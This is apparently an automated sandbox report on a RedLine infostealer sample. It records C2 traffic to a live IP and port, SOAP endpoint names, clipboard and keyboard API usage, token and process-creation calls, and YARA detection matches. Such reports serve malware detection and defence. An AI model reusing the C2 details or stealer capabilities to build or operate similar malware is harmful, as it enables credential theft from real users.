Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90
Source: unknown	TCP traffic detected without corresponding DNS query: 185.222.58.90

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_0023CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_0023CE44

Source: global traffic

DNS traffic detected: DNS query: api.ip.sb

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1883053788.00000000025DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.90:55615
Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.222.58.90:55615/
Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000025DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: RegSvcs.exe, 00000001.00000002.1883053788.0000000002500000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RegSvcs.exe, 00000001.00000002.1883053788.0000000002500000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000025DC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1883053788.0000000002500000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000025DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: RegSvcs.exe, 00000001.00000002.1883053788.00000000024B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: K3xL5Xy0XS.exe, 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: K3xL5Xy0XS.exe, 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: K3xL5Xy0XS.exe, 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: RegSvcs.exe, 00000001.00000002.1884442695.0000000003672000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000001.00000002.1884442695.00000000036CB000.00000004.00000800.00020000.00000000.sdmp, tmpC1B.tmp.1.dr, tmp43C0.tmp.1.dr, tmp439F.tmp.1.dr, tmpC80.tmp.1.dr, tmp438F.tmp.1.dr, tmpC2C.tmp.1.dr, tmpC3C.tmp.1.dr, tmpC4E.tmp.1.dr, tmp43A0.tmp.1.dr, tmpC5F.tmp.1.dr, tmpC7F.tmp.1.dr, tmpC3D.tmp.1.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_0023EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_0023EAFF

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_0023ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_0023ED6A

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

0_2_0023EAFF

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_0022AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,

0_2_0022AA57

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_00259576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00259576

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.K3xL5Xy0XS.exe.2260000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.K3xL5Xy0XS.exe.2260000.1.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 0.2.K3xL5Xy0XS.exe.2260000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 1.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 1.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.K3xL5Xy0XS.exe.2260000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 0.2.K3xL5Xy0XS.exe.2260000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 0.2.K3xL5Xy0XS.exe.2260000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000001.00000002.1881857906.0000000000162000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: Process Memory Space: K3xL5Xy0XS.exe PID: 3808, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 2368, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

Binary is likely a compiled AutoIt script file

Source: K3xL5Xy0XS.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: K3xL5Xy0XS.exe, 00000000.00000000.1668594220.0000000000282000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_7457949b-d
Source: K3xL5Xy0XS.exe, 00000000.00000000.1668594220.0000000000282000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_5aa88f64-e
Source: K3xL5Xy0XS.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_ce0d0384-b
Source: K3xL5Xy0XS.exe	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_e40ad050-e

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_0022D5EB: CreateFileW,DeviceIoControl,CloseHandle,

0_2_0022D5EB

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_00221201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00221201

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe

Code function: 0_2_0022E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_0022E8F6

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001CBF40	0_2_001CBF40
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_00232046	0_2_00232046
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001C8060	0_2_001C8060
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_00228298	0_2_00228298
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001FE4FF	0_2_001FE4FF
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001F676B	0_2_001F676B
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_00254873	0_2_00254873
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001ECAA0	0_2_001ECAA0
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001CCAF0	0_2_001CCAF0
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001DCC39	0_2_001DCC39
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001F6DD9	0_2_001F6DD9
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001DB119	0_2_001DB119
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001C91C0	0_2_001C91C0
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001E1394	0_2_001E1394
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001E1706	0_2_001E1706
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001E781B	0_2_001E781B
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001C7920	0_2_001C7920
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001D997D	0_2_001D997D
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001E19B0	0_2_001E19B0
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001E7A4A	0_2_001E7A4A
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001E1C77	0_2_001E1C77
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001E7CA7	0_2_001E7CA7
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_0024BE44	0_2_0024BE44
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001F9EEE	0_2_001F9EEE
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_001E1F32	0_2_001E1F32
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: 0_2_01686708	0_2_01686708
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_008DE7B0	1_2_008DE7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 1_2_008DDC90	1_2_008DDC90

Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: String function: 001E0A30 appears 46 times
Source: C:\Users\user\Desktop\K3xL5Xy0XS.exe	Code function: String function: 001DF9F2 appears 31 times

Source: K3xL5Xy0XS.exe, 00000000.00000003.1704782154.0000000004083000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs K3xL5Xy0XS.exe
Source: K3xL5Xy0XS.exe, 00000000.00000003.1705326369.000000000422D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs K3xL5Xy0XS.exe
Source: K3xL5Xy0XS.exe, 00000000.00000002.1708177899.0000000002260000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameImplosions.exe4 vs K3xL5Xy0XS.exe

Source: K3xL5Xy0XS.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 0.2.K3xL5Xy0XS.exe.2260000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.K3xL5Xy0XS.exe.2260000.1.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 0.2.K3xL5Xy0XS.exe.2260000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 1.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 1.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
Source: 1.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.K3xL5Xy0XS.exe.2260000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
Source: 0.2.K3xL5Xy0XS.exe.2260000.1.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
